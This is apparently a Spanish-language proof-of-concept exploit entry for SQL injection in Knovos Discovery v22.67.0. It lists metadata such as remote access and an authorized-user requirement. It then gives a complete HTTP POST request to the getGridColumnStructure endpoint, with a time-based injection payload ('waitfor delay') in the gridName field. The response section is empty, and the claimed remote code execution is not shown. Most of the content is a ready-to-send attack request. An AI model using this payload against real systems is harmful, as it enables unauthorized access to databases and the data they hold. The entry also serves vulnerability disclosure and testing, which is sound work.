
Exploit de prueba de concepto para inyección SQL en Knovos Discovery v22.67.0, que demuestra la ejecución remota de código mediante el endpoint getGridColumnStructure.
Vulnerabilidad de inyección SQL en Knovos Discovery v.22.67.0 permite a un atacante remoto ejecutar código arbitrario a través del componente /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure
Inyección SQL
Knovos Discovery
Versión 22.67.0 - Versión 22.67.0
/DiscoveryProcess/Service/Admin.svc/getGridColumnStructure
Remoto
verdadero
verdadero
usuario autorizado
Solicitud:
POST /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure?caseMappingId=*** HTTP/1.1
Host: vuln_host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 73
Connection: close
{
"gridName":"Inventory-grid' waitfor delay'0:0:50'--",
"uID":"10"
}
Respuesta:
